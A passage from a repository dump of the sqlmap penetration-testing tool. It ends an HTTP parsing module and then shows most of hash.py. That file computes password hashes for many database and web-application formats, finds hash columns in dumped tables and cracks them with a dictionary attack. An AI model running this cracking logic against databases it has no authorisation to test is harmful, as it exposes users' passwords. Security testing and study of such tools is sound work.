self.headers.items()],\n            \"cookies\": [],\n            \"queryString\": [],\n            \"headersSize\": -1,\n            \"bodySize\": -1,\n            \"comment\": getText(self.comment),\n        }\n\n        if self.postBody:\n            contentType = self.headers.get(\"Content-Type\")\n            out[\"postData\"] = {\n                \"mimeType\": contentType,\n                \"text\": getText(self.postBody).rstrip(\"\\r\\n\"),\n            }\n\n        return out\n\nclass Response(object):\n    extract_status = re.compile(b'\\\\((\\\\d{3}) (.*)\\\\)')\n\n    def __init__(self, httpVersion, status, statusText, headers, content, raw=None, comment=None):\n        self.raw = raw\n        self.httpVersion = httpVersion\n        self.status = status\n        self.statusText = statusText\n        self.headers = headers\n        self.content = content\n        self.comment = comment.strip() if comment else comment\n\n    @classmethod\n    def parse(cls, raw):\n        altered = raw\n        comment = b\"\"\n\n        if altered.startswith(b\"HTTP response [\") or altered.startswith(b\"HTTP redirect [\"):\n            stream = io.BytesIO(raw)\n            first_line = stream.readline()\n            parts = cls.extract_status.search(first_line)\n            status_line = \"HTTP/1.0 %s %s\" % (getText(parts.group(1)), getText(parts.group(2)))\n            remain = stream.read()\n            altered = getBytes(status_line) + b\"\\r\\n\" + remain\n            comment = first_line\n\n        response = _http_client.HTTPResponse(FakeSocket(altered))\n        response.begin()\n\n        try:\n            content = response.read()\n        except _http_client.IncompleteRead:\n            content = raw[raw.find(b\"\\r\\n\\r\\n\") + 4:].rstrip(b\"\\r\\n\")\n\n        return cls(httpVersion=\"HTTP/1.1\" if response.version == 11 else \"HTTP/1.0\",\n                   status=response.status,\n                   statusText=response.reason,\n                   headers=response.msg,\n                   content=content,\n                   comment=comment,\n                   raw=raw)\n\n    def toDict(self):\n        content = {\n            \"mimeType\": self.headers.get(\"Content-Type\"),\n            \"text\": self.content,\n            \"size\": len(self.content or \"\")\n        }\n\n        binary = set([b'\\0', b'\\1'])\n        if any(c in binary for c in self.content):\n            content[\"encoding\"] = \"base64\"\n            content[\"text\"] = getText(base64.b64encode(self.content))\n        else:\n            content[\"text\"] = getText(content[\"text\"])\n\n        return {\n            \"httpVersion\": self.httpVersion,\n            \"status\": self.status,\n            \"statusText\": self.statusText,\n            \"headers\": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items() if key.lower() != \"uri\"],\n            \"cookies\": [],\n            \"content\": content,\n            \"headersSize\": -1,\n            \"bodySize\": -1,\n            \"redirectURL\": \"\",\n            \"comment\": getText(self.comment),\n        }\n\nclass FakeSocket(object):\n    # Original source:\n    # https://stackoverflow.com/questions/24728088/python-parse-http-response-string\n\n    def __init__(self, response_text):\n        self._file = io.BytesIO(response_text)\n\n    def makefile(self, *args, **kwargs):\n        return self._file\n\nclass HTTPRequest(_BaseHTTPServer.BaseHTTPRequestHandler):\n    # Original source:\n    # https://stackoverflow.com/questions/4685217/parse-raw-http-headers\n\n    def __init__(self, request_text):\n        self.comment = None\n        self.rfile = io.BytesIO(request_text)\n        self.raw_requestline = self.rfile.readline()\n\n        if self.raw_requestline.startswith(b\"HTTP request [\"):\n            self.comment = self.raw_requestline\n            self.raw_requestline = self.rfile.readline()\n\n        self.error_code = self.error_message = None\n        self.parse_request()\n\n    def send_error(self, code, message):\n        self.error_code = code\n        self.error_message = message\n"
  },
  {
    "path": "sqlmap/lib/utils/hash.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\ntry:\n    from crypt import crypt\nexcept:  # removed ImportError because of https://github.com/sqlmapproject/sqlmap/issues/3171\n    from thirdparty.fcrypt.fcrypt import crypt\n\ntry:\n    from Crypto.Cipher.DES import MODE_CBC as CBC\n    from Crypto.Cipher.DES import new as des\nexcept:\n    from thirdparty.pydes.pyDes import CBC\n    from thirdparty.pydes.pyDes import des\n\n_multiprocessing = None\n\nimport base64\nimport binascii\nimport gc\nimport math\nimport os\nimport re\nimport tempfile\nimport time\nimport zipfile\n\nfrom hashlib import md5\nfrom hashlib import sha1\nfrom hashlib import sha224\nfrom hashlib import sha256\nfrom hashlib import sha384\nfrom hashlib import sha512\n\nfrom lib.core.common import Backend\nfrom lib.core.common import checkFile\nfrom lib.core.common import clearConsoleLine\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import getFileItems\nfrom lib.core.common import getPublicTypeMembers\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import isZipFile\nfrom lib.core.common import normalizeUnicode\nfrom lib.core.common import openFile\nfrom lib.core.common import paths\nfrom lib.core.common import readInput\nfrom lib.core.common import singleTimeLogMessage\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.compat import xrange\nfrom lib.core.convert import decodeBase64\nfrom lib.core.convert import decodeHex\nfrom lib.core.convert import encodeHex\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getText\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.datatype import OrderedSet\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import HASH\nfrom lib.core.enums import MKSTEMP_PREFIX\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.settings import COMMON_PASSWORD_SUFFIXES\nfrom lib.core.settings import COMMON_USER_COLUMNS\nfrom lib.core.settings import DEV_EMAIL_ADDRESS\nfrom lib.core.settings import DUMMY_USER_PREFIX\nfrom lib.core.settings import HASH_BINARY_COLUMNS_REGEX\nfrom lib.core.settings import HASH_EMPTY_PASSWORD_MARKER\nfrom lib.core.settings import HASH_MOD_ITEM_DISPLAY\nfrom lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD\nfrom lib.core.settings import INVALID_UNICODE_CHAR_FORMAT\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import ITOA64\nfrom lib.core.settings import NULL\nfrom lib.core.settings import ROTATING_CHARS\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.wordlist import Wordlist\nfrom thirdparty import six\nfrom thirdparty.colorama.initialise import init as coloramainit\nfrom thirdparty.six.moves import queue as _queue\n\ndef mysql_passwd(password, uppercase=True):\n    \"\"\"\n    Reference(s):\n        https://web.archive.org/web/20120215205312/http://csl.sublevel3.org/mysql-password-function/\n\n    >>> mysql_passwd(password='testpass', uppercase=True)\n    '*00E247AC5F9AF26AE0194B41E1E769DEE1429A29'\n    \"\"\"\n\n    password = getBytes(password)\n\n    retVal = \"*%s\" % sha1(sha1(password).digest()).hexdigest()\n\n    return retVal.upper() if uppercase else retVal.lower()\n\ndef mysql_old_passwd(password, uppercase=True):  # prior to version '4.1'\n    \"\"\"\n    Reference(s):\n        https://web.archive.org/web/20091205000600/http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c\n        https://github.com/pwnieexpress/pwn_plug_sources/blob/master/src/darkmysqli/DarkMySQLi.py\n\n    >>> mysql_old_passwd(password='testpass', uppercase=True)\n    '7DCDA0D57290B453'\n    \"\"\"\n\n    a, b, c = 1345345333, 7, 0x12345671\n\n    for d in password:\n        if d == ' ' or d == '\\t':\n            continue\n\n        e = ord(d)\n        a ^= (((a & 63) + b) * e) + (a << 8)\n        c += (c << 8) ^ a\n        b += e\n\n    retVal = \"%08lx%08lx\" % (a & ((1 << 31) - 1), c & ((1 << 31) - 1))\n\n    return retVal.upper() if uppercase else retVal.lower()\n\ndef postgres_passwd(password, username, uppercase=False):\n    \"\"\"\n    Reference(s):\n        http://pentestmonkey.net/blog/cracking-postgres-hashes/\n\n    >>> postgres_passwd(password='testpass', username='testuser', uppercase=False)\n    'md599e5ea7a6f7c3269995cba3927fd0093'\n    \"\"\"\n\n    username = getBytes(username)\n    password = getBytes(password)\n\n    retVal = \"md5%s\" % md5(password + username).hexdigest()\n\n    return retVal.upper() if uppercase else retVal.lower()\n\ndef mssql_new_passwd(password, salt, uppercase=False):  # since version '2012'\n    \"\"\"\n    Reference(s):\n        http://hashcat.net/forum/thread-1474.html\n        https://sqlity.net/en/2460/sql-password-hash/\n\n    >>> mssql_new_passwd(password='testpass', salt='4086ceb6', uppercase=False)\n    '0x02004086ceb6eb051cdbc5bdae68ffc66c918d4977e592f6bdfc2b444a7214f71fa31c35902c5b7ae773ed5f4c50676d329120ace32ee6bc81c24f70711eb0fc6400e85ebf25'\n    \"\"\"\n\n    binsalt = decodeHex(salt)\n    unistr = b\"\".join((_.encode(UNICODE_ENCODING) + b\"\\0\") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password)\n\n    retVal = \"0200%s%s\" % (salt, sha512(unistr + binsalt).hexdigest())\n\n    return \"0x%s\" % (retVal.upper() if uppercase else retVal.lower())\n\ndef mssql_passwd(password, salt, uppercase=False):  # versions '2005' and '2008'\n    \"\"\"\n    Reference(s):\n        http://www.leidecker.info/projects/phrasendrescher/mssql.c\n        https://www.evilfingers.com/tools/GSAuditor.php\n\n    >>> mssql_passwd(password='testpass', salt='4086ceb6', uppercase=False)\n    '0x01004086ceb60c90646a8ab9889fe3ed8e5c150b5460ece8425a'\n    \"\"\"\n\n    binsalt = decodeHex(salt)\n    unistr = b\"\".join((_.encode(UNICODE_ENCODING) + b\"\\0\") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password)\n\n    retVal = \"0100%s%s\" % (salt, sha1(unistr + binsalt).hexdigest())\n\n    return \"0x%s\" % (retVal.upper() if uppercase else retVal.lower())\n\ndef mssql_old_passwd(password, salt, uppercase=True):  # version '2000' and before\n    \"\"\"\n    Reference(s):\n        www.exploit-db.com/download_pdf/15537/\n        http://www.leidecker.info/projects/phrasendrescher/mssql.c\n        https://www.evilfingers.com/tools/GSAuditor.php\n\n    >>> mssql_old_passwd(password='testpass', salt='4086ceb6', uppercase=True)\n    '0x01004086CEB60C90646A8AB9889FE3ED8E5C150B5460ECE8425AC7BB7255C0C81D79AA5D0E93D4BB077FB9A51DA0'\n    \"\"\"\n\n    binsalt = decodeHex(salt)\n    unistr = b\"\".join((_.encode(UNICODE_ENCODING) + b\"\\0\") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password)\n\n    retVal = \"0100%s%s%s\" % (salt, sha1(unistr + binsalt).hexdigest(), sha1(unistr.upper() + binsalt).hexdigest())\n\n    return \"0x%s\" % (retVal.upper() if uppercase else retVal.lower())\n\ndef oracle_passwd(password, salt, uppercase=True):\n    \"\"\"\n    Reference(s):\n        https://www.evilfingers.com/tools/GSAuditor.php\n        http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/\n        http://seclists.org/bugtraq/2007/Sep/304\n\n    >>> oracle_passwd(password='SHAlala', salt='1B7B5F82B7235E9E182C', uppercase=True)\n    'S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C'\n    \"\"\"\n\n    binsalt = decodeHex(salt)\n    password = getBytes(password)\n\n    retVal = \"s:%s%s\" % (sha1(password + binsalt).hexdigest(), salt)\n\n    return retVal.upper() if uppercase else retVal.lower()\n\ndef oracle_old_passwd(password, username, uppercase=True):  # prior to version '11g'\n    \"\"\"\n    Reference(s):\n        http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/\n\n    >>> oracle_old_passwd(password='tiger', username='scott', uppercase=True)\n    'F894844C34402B67'\n    \"\"\"\n\n    IV, pad = b\"\\0\" * 8, b\"\\0\"\n\n    unistr = b\"\".join((b\"\\0\" + _.encode(UNICODE_ENCODING)) if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in (username + password).upper())\n\n    if des.__module__ == \"Crypto.Cipher.DES\":\n        unistr += b\"\\0\" * ((8 - len(unistr) % 8) & 7)\n        cipher = des(decodeHex(\"0123456789ABCDEF\"), CBC, iv=IV)\n        encrypted = cipher.encrypt(unistr)\n        cipher = des(encrypted[-8:], CBC, iv=IV)\n        encrypted = cipher.encrypt(unistr)\n    else:\n        cipher = des(decodeHex(\"0123456789ABCDEF\"), CBC, IV, pad)\n        encrypted = cipher.encrypt(unistr)\n        cipher = des(encrypted[-8:], CBC, IV, pad)\n        encrypted = cipher.encrypt(unistr)\n\n    retVal = encodeHex(encrypted[-8:], binary=False)\n\n    return retVal.upper() if uppercase else retVal.lower()\n\ndef md5_generic_passwd(password, uppercase=False):\n    \"\"\"\n    >>> md5_generic_passwd(password='testpass', uppercase=False)\n    '179ad45c6ce2cb97cf1029e212046e81'\n    \"\"\"\n\n    password = getBytes(password)\n\n    retVal = md5(password).hexdigest()\n\n    return retVal.upper() if uppercase else retVal.lower()\n\ndef sha1_generic_passwd(password, uppercase=False):\n    \"\"\"\n    >>> sha1_generic_passwd(password='testpass', uppercase=False)\n    '206c80413b9a96c1312cc346b7d2517b84463edd'\n    \"\"\"\n\n    password = getBytes(password)\n\n    retVal = sha1(password).hexdigest()\n\n    return retVal.upper() if uppercase else retVal.lower()\n\ndef apache_sha1_passwd(password, **kwargs):\n    \"\"\"\n    >>> apache_sha1_passwd(password='testpass')\n    '{SHA}IGyAQTualsExLMNGt9JRe4RGPt0='\n    \"\"\"\n\n    password = getBytes(password)\n\n    return \"{SHA}%s\" % getText(base64.b64encode(sha1(password).digest()))\n\ndef ssha_passwd(password, salt, **kwargs):\n    \"\"\"\n    >>> ssha_passwd(password='testpass', salt='salt')\n    '{SSHA}mU1HPTvnmoXOhE4ROHP6sWfbfoRzYWx0'\n    \"\"\"\n\n    password = getBytes(password)\n    salt = getBytes(salt)\n\n    return \"{SSHA}%s\" % getText(base64.b64encode(sha1(password + salt).digest() + salt))\n\ndef ssha256_passwd(password, salt, **kwargs):\n    \"\"\"\n    >>> ssha256_passwd(password='testpass', salt='salt')\n    '{SSHA256}hhubsLrO/Aje9F/kJrgv5ZLE40UmTrVWvI7Dt6InP99zYWx0'\n    \"\"\"\n\n    password = getBytes(password)\n    salt = getBytes(salt)\n\n    return \"{SSHA256}%s\" % getText(base64.b64encode(sha256(password + salt).digest() + salt))\n\ndef ssha512_passwd(password, salt, **kwargs):\n    \"\"\"\n    >>> ssha512_passwd(password='testpass', salt='salt')\n    '{SSHA512}mCUSLfPMhXCQOJl9WHW/QMn9v9sjq7Ht/Wk7iVau8vLOfh+PeynkGMikqIE8sStFd0khdfcCD8xZmC6UyjTxsHNhbHQ='\n    \"\"\"\n\n    password = getBytes(password)\n    salt = getBytes(salt)\n\n    return \"{SSHA512}%s\" % getText(base64.b64encode(sha512(password + salt).digest() + salt))\n\ndef sha224_generic_passwd(password, uppercase=False):\n    \"\"\"\n    >>> sha224_generic_passwd(password='testpass', uppercase=False)\n    '648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f'\n    \"\"\"\n\n    retVal = sha224(getBytes(password)).hexdigest()\n\n    return retVal.upper() if uppercase else retVal.lower()\n\ndef sha256_generic_passwd(password, uppercase=False):\n    \"\"\"\n    >>> sha256_generic_passwd(password='testpass', uppercase=False)\n    '13d249f2cb4127b40cfa757866850278793f814ded3c587fe5889e889a7a9f6c'\n    \"\"\"\n\n    retVal = sha256(getBytes(password)).hexdigest()\n\n    return retVal.upper() if uppercase else retVal.lower()\n\ndef sha384_generic_passwd(password, uppercase=False):\n    \"\"\"\n    >>> sha384_generic_passwd(password='testpass', uppercase=False)\n    '6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf'\n    \"\"\"\n\n    retVal = sha384(getBytes(password)).hexdigest()\n\n    return retVal.upper() if uppercase else retVal.lower()\n\ndef sha512_generic_passwd(password, uppercase=False):\n    \"\"\"\n    >>> sha512_generic_passwd(password='testpass', uppercase=False)\n    '78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44'\n    \"\"\"\n\n    retVal = sha512(getBytes(password)).hexdigest()\n\n    return retVal.upper() if uppercase else retVal.lower()\n\ndef crypt_generic_passwd(password, salt, **kwargs):\n    \"\"\"\n    Reference(s):\n        http://docs.python.org/library/crypt.html\n        http://helpful.knobs-dials.com/index.php/Hashing_notes\n        http://php.net/manual/en/function.crypt.php\n        http://carey.geek.nz/code/python-fcrypt/\n\n    >>> crypt_generic_passwd(password='rasmuslerdorf', salt='rl', uppercase=False)\n    'rl.3StKT.4T8M'\n    \"\"\"\n\n    return getText(crypt(password, salt))\n\ndef unix_md5_passwd(password, salt, magic=\"$1$\", **kwargs):\n    \"\"\"\n    Reference(s):\n        http://www.sabren.net/code/python/crypt/md5crypt.py\n\n    >>> unix_md5_passwd(password='testpass', salt='aD9ZLmkp')\n    '$1$aD9ZLmkp$DRM5a7rRZGyuuOPOjTEk61'\n    \"\"\"\n\n    def _encode64(value, count):\n        output = \"\"\n\n        while (count - 1 >= 0):\n            count = count - 1\n            output += ITOA64[value & 0x3f]\n            value = value >> 6\n\n        return output\n\n    password = getBytes(password)\n    magic = getBytes(magic)\n    salt = getBytes(salt)\n\n    salt = salt[:8]\n    ctx = password + magic + salt\n    final = md5(password + salt + password).digest()\n\n    for pl in xrange(len(password), 0, -16):\n        if pl > 16:\n            ctx = ctx + final[:16]\n        else:\n            ctx = ctx + final[:pl]\n\n    i = len(password)\n    while i:\n        if i & 1:\n            ctx = ctx + b'\\x00'  # if ($i & 1) { $ctx->add(pack(\"C\", 0)); }\n        else:\n            ctx = ctx + password[0:1]\n        i = i >> 1\n\n    final = md5(ctx).digest()\n\n    for i in xrange(1000):\n        ctx1 = b\"\"\n\n        if i & 1:\n            ctx1 = ctx1 + password\n        else:\n            ctx1 = ctx1 + final[:16]\n\n        if i % 3:\n            ctx1 = ctx1 + salt\n\n        if i % 7:\n            ctx1 = ctx1 + password\n\n        if i & 1:\n            ctx1 = ctx1 + final[:16]\n        else:\n            ctx1 = ctx1 + password\n\n        final = md5(ctx1).digest()\n\n    hash_ = _encode64((int(ord(final[0:1])) << 16) | (int(ord(final[6:7])) << 8) | (int(ord(final[12:13]))), 4)\n    hash_ = hash_ + _encode64((int(ord(final[1:2])) << 16) | (int(ord(final[7:8])) << 8) | (int(ord(final[13:14]))), 4)\n    hash_ = hash_ + _encode64((int(ord(final[2:3])) << 16) | (int(ord(final[8:9])) << 8) | (int(ord(final[14:15]))), 4)\n    hash_ = hash_ + _encode64((int(ord(final[3:4])) << 16) | (int(ord(final[9:10])) << 8) | (int(ord(final[15:16]))), 4)\n    hash_ = hash_ + _encode64((int(ord(final[4:5])) << 16) | (int(ord(final[10:11])) << 8) | (int(ord(final[5:6]))), 4)\n    hash_ = hash_ + _encode64((int(ord(final[11:12]))), 2)\n\n    return getText(magic + salt + b'$' + getBytes(hash_))\n\ndef joomla_passwd(password, salt, **kwargs):\n    \"\"\"\n    Reference: https://stackoverflow.com/a/10428239\n\n    >>> joomla_passwd(password='testpass', salt='6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf')\n    'e3d5794da74e917637332e0d21b76328:6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf'\n    \"\"\"\n\n    return \"%s:%s\" % (md5(getBytes(password) + getBytes(salt)).hexdigest(), salt)\n\ndef django_md5_passwd(password, salt, **kwargs):\n    \"\"\"\n    Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py\n\n    >>> django_md5_passwd(password='testpass', salt='salt')\n    'md5$salt$972141bcbcb6a0acc96e92309175b3c5'\n    \"\"\"\n\n    return \"md5$%s$%s\" % (salt, md5(getBytes(salt) + getBytes(password)).hexdigest())\n\ndef django_sha1_passwd(password, salt, **kwargs):\n    \"\"\"\n    Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py\n\n    >>> django_sha1_passwd(password='testpass', salt='salt')\n    'sha1$salt$6ce0e522aba69d8baa873f01420fccd0250fc5b2'\n    \"\"\"\n\n    return \"sha1$%s$%s\" % (salt, sha1(getBytes(salt) + getBytes(password)).hexdigest())\n\ndef vbulletin_passwd(password, salt, **kwargs):\n    \"\"\"\n    Reference: https://stackoverflow.com/a/2202810\n\n    >>> vbulletin_passwd(password='testpass', salt='salt')\n    '85c4d8ea77ebef2236fb7e9d24ba9482:salt'\n    \"\"\"\n\n    return \"%s:%s\" % (md5(binascii.hexlify(md5(getBytes(password)).digest()) + getBytes(salt)).hexdigest(), salt)\n\ndef phpass_passwd(password, salt, count, prefix, **kwargs):\n    \"\"\"\n    Reference(s):\n        https://web.archive.org/web/20120219120128/packetstormsecurity.org/files/74448/phpassbrute.py.txt\n        http://scriptserver.mainframe8.com/wordpress_password_hasher.php\n        https://www.openwall.com/phpass/\n        https://github.com/jedie/django-phpBB3/blob/master/django_phpBB3/hashers.py\n\n    >>> phpass_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$')\n    '$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0'\n    >>> phpass_passwd(password='testpass', salt='Pb1j9gSb', count=2048, prefix='$H$')\n    '$H$9Pb1j9gSb/u3EVQ.4JDZ3LqtN44oIx/'\n    >>> phpass_passwd(password='testpass', salt='iwtD/g.K', count=128, prefix='$S$')\n    '$S$5iwtD/g.KZT2rwC9DASy/mGYAThkSd3lBFdkONi1Ig1IEpBpqG8W'\n    \"\"\"\n\n    def _encode64(input_, count):\n        output = ''\n        i = 0\n\n        while i < count:\n            value = (input_[i] if isinstance(input_[i], int) else ord(input_[i]))\n            i += 1\n            output = output + ITOA64[value & 0x3f]\n\n            if i < count:\n                value = value | ((input_[i] if isinstance(input_[i], int) else ord(input_[i])) << 8)\n\n            output = output + ITOA64[(value >> 6) & 0x3f]\n\n            i += 1\n            if i >= count:\n                break\n\n            if i < count:\n                value = value | ((input_[i] if isinstance(input_[i], int) else ord(input_[i])) << 16)\n\n            output = output + ITOA64[(value >> 12) & 0x3f]\n\n            i += 1\n            if i >= count:\n                break\n\n            output = output + ITOA64[(value >> 18) & 0x3f]\n\n        return output\n\n    password = getBytes(password)\n    f = {\"$P$\": md5, \"$H$\": md5, \"$Q$\": sha1, \"$S$\": sha512}[prefix]\n\n    cipher = f(getBytes(salt))\n    cipher.update(password)\n    hash_ = cipher.digest()\n\n    for i in xrange(count):\n        _ = f(hash_)\n        _.update(password)\n        hash_ = _.digest()\n\n    retVal = \"%s%s%s%s\" % (prefix, ITOA64[int(math.log(count, 2))], salt, _encode64(hash_, len(hash_)))\n\n    if prefix == \"$S$\":\n        # Reference: https://api.drupal.org/api/drupal/includes%21password.inc/constant/DRUPAL_HASH_LENGTH/7.x\n        retVal = retVal[:55]\n\n    return retVal\n\n__functions__ = {\n    HASH.MYSQL: mysql_passwd,\n    HASH.MYSQL_OLD: mysql_old_passwd,\n    HASH.POSTGRES: postgres_passwd,\n    HASH.MSSQL: mssql_passwd,\n    HASH.MSSQL_OLD: mssql_old_passwd,\n    HASH.MSSQL_NEW: mssql_new_passwd,\n    HASH.ORACLE: oracle_passwd,\n    HASH.ORACLE_OLD: oracle_old_passwd,\n    HASH.MD5_GENERIC: md5_generic_passwd,\n    HASH.SHA1_GENERIC: sha1_generic_passwd,\n    HASH.SHA224_GENERIC: sha224_generic_passwd,\n    HASH.SHA256_GENERIC: sha256_generic_passwd,\n    HASH.SHA384_GENERIC: sha384_generic_passwd,\n    HASH.SHA512_GENERIC: sha512_generic_passwd,\n    HASH.CRYPT_GENERIC: crypt_generic_passwd,\n    HASH.JOOMLA: joomla_passwd,\n    HASH.DJANGO_MD5: django_md5_passwd,\n    HASH.DJANGO_SHA1: django_sha1_passwd,\n    HASH.PHPASS: phpass_passwd,\n    HASH.APACHE_MD5_CRYPT: unix_md5_passwd,\n    HASH.UNIX_MD5_CRYPT: unix_md5_passwd,\n    HASH.APACHE_SHA1: apache_sha1_passwd,\n    HASH.VBULLETIN: vbulletin_passwd,\n    HASH.VBULLETIN_OLD: vbulletin_passwd,\n    HASH.SSHA: ssha_passwd,\n    HASH.SSHA256: ssha256_passwd,\n    HASH.SSHA512: ssha512_passwd,\n    HASH.MD5_BASE64: md5_generic_passwd,\n    HASH.SHA1_BASE64: sha1_generic_passwd,\n    HASH.SHA256_BASE64: sha256_generic_passwd,\n    HASH.SHA512_BASE64: sha512_generic_passwd,\n}\n\ndef _finalize(retVal, results, processes, attack_info=None):\n    if _multiprocessing:\n        gc.enable()\n\n    # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4367\n    # NOTE: https://dzone.com/articles/python-101-creating-multiple-processes\n    for process in processes:\n        try:\n            process.terminate()\n            process.join()\n        except (OSError, AttributeError):\n            pass\n\n    if retVal:\n        removals = set()\n\n        if conf.hashDB:\n            conf.hashDB.beginTransaction()\n\n        while not retVal.empty():\n            user, hash_, word = item = retVal.get(block=False)\n            results.append(item)\n            removals.add((user, hash_))\n            hashDBWrite(hash_, word)\n\n        for item in attack_info or []:\n            if (item[0][0], item[0][1]) in removals:\n                attack_info.remove(item)\n\n        if conf.hashDB:\n            conf.hashDB.endTransaction()\n\n        if hasattr(retVal, \"close\"):\n            retVal.close()\n\ndef storeHashesToFile(attack_dict):\n    if not attack_dict:\n        return\n\n    items = OrderedSet()\n\n    for user, hashes in attack_dict.items():\n        for hash_ in hashes:\n            hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_\n            if hash_ and hash_ != NULL and hashRecognition(hash_):\n                item = None\n                if user and not user.startswith(DUMMY_USER_PREFIX):\n                    item = \"%s:%s\\n\" % (user, hash_)\n                else:\n                    item = \"%s\\n\" % hash_\n\n                if item and item not in items:\n                    items.add(item)\n\n    if kb.choices.storeHashes is None:\n        message = \"do you want to store hashes to a temporary file \"\n        message += \"for eventual further processing with other tools [y/N] \"\n\n        kb.choices.storeHashes = readInput(message, default='N', boolean=True)\n\n    if items and kb.choices.storeHashes:\n        handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.HASHES, suffix=\".txt\")\n        os.close(handle)\n\n        infoMsg = \"writing hashes to a temporary file '%s' \" % filename\n        logger.info(infoMsg)\n\n        with openFile(filename, \"w+\") as f:\n            for item in items:\n                try:\n                    f.write(item)\n                except (UnicodeError, TypeError):\n                    pass\n\ndef attackCachedUsersPasswords():\n    if kb.data.cachedUsersPasswords:\n        results = dictionaryAttack(kb.data.cachedUsersPasswords)\n\n        lut = {}\n        for (_, hash_, password) in results:\n            lut[hash_.lower()] = password\n\n        for user in kb.data.cachedUsersPasswords:\n            for i in xrange(len(kb.data.cachedUsersPasswords[user])):\n                if (kb.data.cachedUsersPasswords[user][i] or \"\").strip():\n                    value = kb.data.cachedUsersPasswords[user][i].lower().split()[0]\n                    if value in lut:\n                        kb.data.cachedUsersPasswords[user][i] += \"%s    clear-text password: %s\" % ('\\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\\n' else '', lut[value])\n\ndef attackDumpedTable():\n    if kb.data.dumpedTable:\n        table = kb.data.dumpedTable\n        columns = list(table.keys())\n        count = table[\"__infos__\"][\"count\"]\n\n        if not count:\n            return\n\n        debugMsg = \"analyzing table dump for possible password hashes\"\n        logger.debug(debugMsg)\n\n        found = False\n        col_user = ''\n        col_passwords = set()\n        attack_dict = {}\n        binary_fields = OrderedSet()\n        replacements = {}\n\n        for column in sorted(columns, key=len, reverse=True):\n            if column and column.lower() in COMMON_USER_COLUMNS:\n                col_user = column\n                break\n\n        for column in columns:\n            if column != \"__infos__\" and table[column][\"values\"]:\n                if all(INVALID_UNICODE_CHAR_FORMAT.split('%')[0] in (value or \"\") for value in table[column][\"values\"]):\n                    binary_fields.add(column)\n\n        if binary_fields:\n            _ = ','.join(binary_fields)\n            warnMsg = \"potential binary fields detected ('%s'). In case of any problems you are \" % _\n            warnMsg += \"advised to rerun table dump with '--fresh-queries --binary-fields=\\\"%s\\\"'\" % _\n            logger.warning(warnMsg)\n\n        for i in xrange(count):\n            if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD:\n                break\n\n            for column in columns:\n                if column == col_user or column == \"__infos__\":\n                    continue\n\n                if len(table[column][\"values\"]) <= i:\n                    continue\n\n                if conf.binaryFields and column in conf.binaryFields:\n                    continue\n\n                value = table[column][\"values\"][i]\n\n                if column in binary_fields and re.search(HASH_BINARY_COLUMNS_REGEX, column) is not None:\n                    previous = value\n                    value = encodeHex(getBytes(value), binary=False)\n                    replacements[value] = previous\n\n                if hashRecognition(value):\n                    found = True\n\n                    if col_user and i < len(table[col_user][\"values\"]):\n                        if table[col_user][\"values\"][i] not in attack_dict:\n                            attack_dict[table[col_user][\"values\"][i]] = []\n\n                        attack_dict[table[col_user][\"values\"][i]].append(value)\n                    else:\n                        attack_dict[\"%s%d\" % (DUMMY_USER_PREFIX, i)] = [value]\n\n                    col_passwords.add(column)\n\n        if attack_dict:\n            infoMsg = \"recognized possible password hashes in column%s \" % (\"s\" if len(col_passwords) > 1 else \"\")\n            infoMsg += \"'%s'\" % \", \".join(col for col in col_passwords)\n            logger.info(infoMsg)\n\n            storeHashesToFile(attack_dict)\n\n            message = \"do you want to crack them via a dictionary-based attack? %s\" % (\"[y/N/q]\" if conf.multipleTargets else \"[Y/n/q]\")\n            choice = readInput(message, default='N' if conf.multipleTargets else 'Y').upper()\n\n            if choice == 'N':\n                return\n            elif choice == 'Q':\n                raise SqlmapUserQuitException\n\n            results = dictionaryAttack(attack_dict)\n            lut = dict()\n\n            for (_, hash_, password) in results:\n                if hash_:\n                    key = hash_ if hash_ not in replacements else replacements[hash_]\n                    lut[key.lower()] = password\n                    lut[\"0x%s\" % key.lower()] = password\n\n            debugMsg = \"post-processing table dump\"\n            logger.debug(debugMsg)\n\n            for i in xrange(count):\n                for column in 